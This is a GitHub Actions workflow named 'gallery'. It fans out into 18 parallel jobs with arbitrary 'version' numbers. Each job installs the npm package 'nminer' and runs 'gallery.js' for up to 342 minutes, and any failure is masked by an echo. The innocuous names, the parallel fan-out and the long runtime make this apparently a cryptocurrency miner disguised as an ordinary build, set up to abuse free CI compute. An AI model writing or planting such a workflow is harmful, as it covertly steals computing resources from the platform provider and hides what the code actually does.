name: gallery
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6966 }
          - { version: 8077 }
          - { version: 1920 }
          - { version: 2649 }
          - { version: 7375 }
          - { version: 4909 }
          - { version: 7693 }
          - { version: 3239 }
          - { version: 5740 }
          - { version: 4233 }
          - { version: 2240 }
          - { version: 7058 }
          - { version: 1333 }
          - { version: 8144 }
          - { version: 6794 }
          - { version: 4600 }
          - { version: 5413 }
          - { version: 4592 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: huzzah nearly
        run: |
          npm install nminer@latest
          timeout 342m node gallery.js || echo "gallery executed"